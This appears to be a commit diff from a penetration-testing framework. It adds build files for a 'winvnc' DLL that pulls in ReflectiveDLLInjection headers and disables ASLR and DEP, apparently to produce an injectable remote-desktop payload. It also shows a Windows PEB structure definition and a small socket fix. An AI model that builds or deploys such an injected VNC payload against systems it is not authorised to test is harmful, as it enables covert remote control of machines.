typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

2
external/source/vncdll/winvnc/VSocket.cpp vendored Normal file → Executable file
View File

@ -70,7 +70,7 @@ class VSocket;
//////////////////////////////////////////////////////// ////////////////////////////////////////////////////////
// *** Lovely hacks to make Win32 work. Hurrah! // *** Lovely hacks to make Win32 work. Hurrah!
#ifdef __WIN32__ #if defined(__WIN32__) && !defined(EWOULDBLOCK)
#define EWOULDBLOCK WSAEWOULDBLOCK #define EWOULDBLOCK WSAEWOULDBLOCK
#endif #endif

File diff suppressed because it is too large Load Diff

473
external/source/vncdll/winvnc/WinVNC.vcxproj vendored Executable file
View File

@ -0,0 +1,473 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectName>winvnc</ProjectName>
<ProjectGuid>{EA6A09AC-04BB-423D-8842-CA48DF901058}</ProjectGuid>
<RootNamespace>WinVNC</RootNamespace>
<SccLocalPath>.</SccLocalPath>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<EmbedManifest>false</EmbedManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<EmbedManifest>false</EmbedManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Midl>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>Win32</TargetEnvironment>
</Midl>
<ClCompile>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<BrowseInformation>true</BrowseInformation>
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0409</Culture>
</ResourceCompile>
<PreLinkEvent>
<Command />
</PreLinkEvent>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<MapExports>true</MapExports>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>X64</TargetEnvironment>
<GenerateTypeLibrary>false</GenerateTypeLibrary>
<HeaderFileName />
<DllDataFileName />
</Midl>
<ClCompile>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<BrowseInformation>true</BrowseInformation>
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0409</Culture>
</ResourceCompile>
<PreLinkEvent>
<Command />
</PreLinkEvent>
<Link>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<SuppressStartupBanner>false</SuppressStartupBanner>
<ManifestFile />
<MapExports>false</MapExports>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress />
<DataExecutionPrevention />
<TargetMachine>NotSet</TargetMachine>
<AllowIsolation>true</AllowIsolation>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Midl>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>Win32</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0809</Culture>
</ResourceCompile>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention />
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0809</Culture>
</ResourceCompile>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention />
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp" />
<ClCompile Include="vncEncodeCoRRE.cpp" />
<ClCompile Include="vncEncodeHexT.cpp" />
<ClCompile Include="vncEncoder.cpp" />
<ClCompile Include="vncEncodeRRE.cpp" />
<ClCompile Include="vncEncodeTight.cpp" />
<ClCompile Include="vncEncodeZlib.cpp" />
<ClCompile Include="vncEncodeZlibHex.cpp" />
<ClCompile Include="omnithread\nt.cpp" />
<ClCompile Include="libjpeg\jcapimin.c" />
<ClCompile Include="libjpeg\jcapistd.c" />
<ClCompile Include="libjpeg\jccoefct.c" />
<ClCompile Include="libjpeg\jccolor.c" />
<ClCompile Include="libjpeg\jcdctmgr.c" />
<ClCompile Include="libjpeg\jchuff.c" />
<ClCompile Include="libjpeg\jcinit.c" />
<ClCompile Include="libjpeg\jcmainct.c" />
<ClCompile Include="libjpeg\jcmarker.c" />
<ClCompile Include="libjpeg\jcmaster.c" />
<ClCompile Include="libjpeg\jcomapi.c" />
<ClCompile Include="libjpeg\jcparam.c" />
<ClCompile Include="libjpeg\jcphuff.c" />
<ClCompile Include="libjpeg\jcprepct.c" />
<ClCompile Include="libjpeg\jcsample.c" />
<ClCompile Include="libjpeg\jctrans.c" />
<ClCompile Include="libjpeg\jdapimin.c" />
<ClCompile Include="libjpeg\jdapistd.c" />
<ClCompile Include="libjpeg\jdatadst.c" />
<ClCompile Include="libjpeg\jdatasrc.c" />
<ClCompile Include="libjpeg\jdcoefct.c" />
<ClCompile Include="libjpeg\jdcolor.c" />
<ClCompile Include="libjpeg\jddctmgr.c" />
<ClCompile Include="libjpeg\jdhuff.c" />
<ClCompile Include="libjpeg\jdinput.c" />
<ClCompile Include="libjpeg\jdmainct.c" />
<ClCompile Include="libjpeg\jdmarker.c" />
<ClCompile Include="libjpeg\jdmaster.c" />
<ClCompile Include="libjpeg\jdmerge.c" />
<ClCompile Include="libjpeg\jdphuff.c" />
<ClCompile Include="libjpeg\jdpostct.c" />
<ClCompile Include="libjpeg\jdsample.c" />
<ClCompile Include="libjpeg\jdtrans.c" />
<ClCompile Include="libjpeg\jerror.c" />
<ClCompile Include="libjpeg\jfdctflt.c" />
<ClCompile Include="libjpeg\jfdctfst.c" />
<ClCompile Include="libjpeg\jfdctint.c" />
<ClCompile Include="libjpeg\jidctflt.c" />
<ClCompile Include="libjpeg\jidctfst.c" />
<ClCompile Include="libjpeg\jidctint.c" />
<ClCompile Include="libjpeg\jidctred.c" />
<ClCompile Include="libjpeg\jmemmgr.c" />
<ClCompile Include="libjpeg\jmemnobs.c" />
<ClCompile Include="libjpeg\jquant1.c" />
<ClCompile Include="libjpeg\jquant2.c" />
<ClCompile Include="libjpeg\jutils.c" />
<ClCompile Include="zlib\adler32.c" />
<ClCompile Include="zlib\compress.c" />
<ClCompile Include="zlib\crc32.c" />
<ClCompile Include="zlib\deflate.c" />
<ClCompile Include="zlib\infblock.c" />
<ClCompile Include="zlib\infcodes.c" />
<ClCompile Include="zlib\inffast.c" />
<ClCompile Include="zlib\inflate.c" />
<ClCompile Include="zlib\inftrees.c" />
<ClCompile Include="zlib\infutil.c" />
<ClCompile Include="zlib\maketree.c" />
<ClCompile Include="zlib\trees.c" />
<ClCompile Include="zlib\uncompr.c" />
<ClCompile Include="zlib\zutil.c" />
<ClCompile Include="d3des.c" />
<ClCompile Include="DynamicFn.cpp" />
<ClCompile Include="FileTransferItemInfo.cpp" />
<ClCompile Include="MinMax.cpp" />
<ClCompile Include="RectList.cpp" />
<ClCompile Include="stdhdrs.cpp" />
<ClCompile Include="tableinitcmtemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="translate.cpp" />
<ClCompile Include="TsSessions.cpp" />
<ClCompile Include="VideoDriver.cpp" />
<ClCompile Include="vncauth.c" />
<ClCompile Include="vncBuffer.cpp" />
<ClCompile Include="vncClient.cpp" />
<ClCompile Include="vncDesktop.cpp" />
<ClCompile Include="vncInstHandler.cpp" />
<ClCompile Include="vncKeymap.cpp" />
<ClCompile Include="vncRegion.cpp" />
<ClCompile Include="vncServer.cpp" />
<ClCompile Include="vncService.cpp" />
<ClCompile Include="vncSockConnect.cpp" />
<ClCompile Include="VSocket.cpp" />
<ClCompile Include="WallpaperUtils.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h" />
<ClInclude Include="omnithread\omnithread.h" />
<ClInclude Include="common.h" />
<ClInclude Include="libjpeg\jchuff.h" />
<ClInclude Include="libjpeg\jconfig.h" />
<ClInclude Include="libjpeg\jdct.h" />
<ClInclude Include="libjpeg\jdhuff.h" />
<ClInclude Include="libjpeg\jerror.h" />
<ClInclude Include="libjpeg\jinclude.h" />
<ClInclude Include="libjpeg\jmemsys.h" />
<ClInclude Include="libjpeg\jmorecfg.h" />
<ClInclude Include="libjpeg\jpegint.h" />
<ClInclude Include="libjpeg\jpeglib.h" />
<ClInclude Include="libjpeg\jversion.h" />
<ClInclude Include="zlib\deflate.h" />
<ClInclude Include="zlib\infblock.h" />
<ClInclude Include="zlib\infcodes.h" />
<ClInclude Include="zlib\inffast.h" />
<ClInclude Include="zlib\inffixed.h" />
<ClInclude Include="zlib\inftrees.h" />
<ClInclude Include="zlib\infutil.h" />
<ClInclude Include="zlib\trees.h" />
<ClInclude Include="zlib\zconf.h" />
<ClInclude Include="zlib\zlib.h" />
<ClInclude Include="zlib\zutil.h" />
<ClInclude Include="AdministrationControls.h" />
<ClInclude Include="d3des.h" />
<ClInclude Include="DynamicFn.h" />
<ClInclude Include="FileTransferItemInfo.h" />
<ClInclude Include="IncomingConnectionsControls.h" />
<ClInclude Include="InputHandlingControls.h" />
<ClInclude Include="keysymdef.h" />
<ClInclude Include="MatchWindow.h" />
<ClInclude Include="MinMax.h" />
<ClInclude Include="PollControls.h" />
<ClInclude Include="QuerySettingsControls.h" />
<ClInclude Include="RectList.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="rfb.h" />
<ClInclude Include="rfbproto.h" />
<ClInclude Include="SharedDesktopArea.h" />
<ClInclude Include="stdhdrs.h" />
<ClInclude Include="translate.h" />
<ClInclude Include="TsSessions.h" />
<ClInclude Include="VideoDriver.h" />
<ClInclude Include="vncAbout.h" />
<ClInclude Include="vncauth.h" />
<ClInclude Include="vncBuffer.h" />
<ClInclude Include="vncClient.h" />
<ClInclude Include="vncDesktop.h" />
<ClInclude Include="vncEncodeCoRRE.h" />
<ClInclude Include="vncEncodeHexT.h" />
<ClInclude Include="vncEncoder.h" />
<ClInclude Include="vncEncodeRRE.h" />
<ClInclude Include="vncEncodeTight.h" />
<ClInclude Include="vncEncodeZlib.h" />
<ClInclude Include="vncEncodeZlibHex.h" />
<ClInclude Include="vncInstHandler.h" />
<ClInclude Include="vncKeymap.h" />
<ClInclude Include="vncPasswd.h" />
<ClInclude Include="vncRegion.h" />
<ClInclude Include="vncServer.h" />
<ClInclude Include="vncService.h" />
<ClInclude Include="vncSockConnect.h" />
<ClInclude Include="VSocket.h" />
<ClInclude Include="VTypes.h" />
<ClInclude Include="WallpaperUtils.h" />
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

View File

@ -0,0 +1,527 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{804c711f-35c6-4aac-9b8a-9cf8b528de85}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\encoder">
<UniqueIdentifier>{7847cf33-fe03-48ad-9a94-a8956821f343}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\omnithread">
<UniqueIdentifier>{a328f948-40d7-4548-9451-66b620124477}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\libjpeg">
<UniqueIdentifier>{cb642898-1056-43ee-828a-40004b207331}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\zlib">
<UniqueIdentifier>{22b4b748-5baf-4a41-9ab0-ef1d45f215aa}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\winvnc">
<UniqueIdentifier>{2a00b2f1-2b80-496f-ade2-3ac76578d435}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{c3a89192-29f8-4ebc-b443-1032d86966d6}</UniqueIdentifier>
<Extensions>.h</Extensions>
</Filter>
<Filter Include="Header Files\libjpeg">
<UniqueIdentifier>{a545ae04-19cc-401a-bb0e-fd3d7aad0f60}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\zlib">
<UniqueIdentifier>{525d33a4-2360-47f9-9e68-24f7d54d50cb}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\winvnc">
<UniqueIdentifier>{e0e45b7e-7137-4fa7-acb3-9c57acce4c9c}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="vncEncodeCoRRE.cpp">
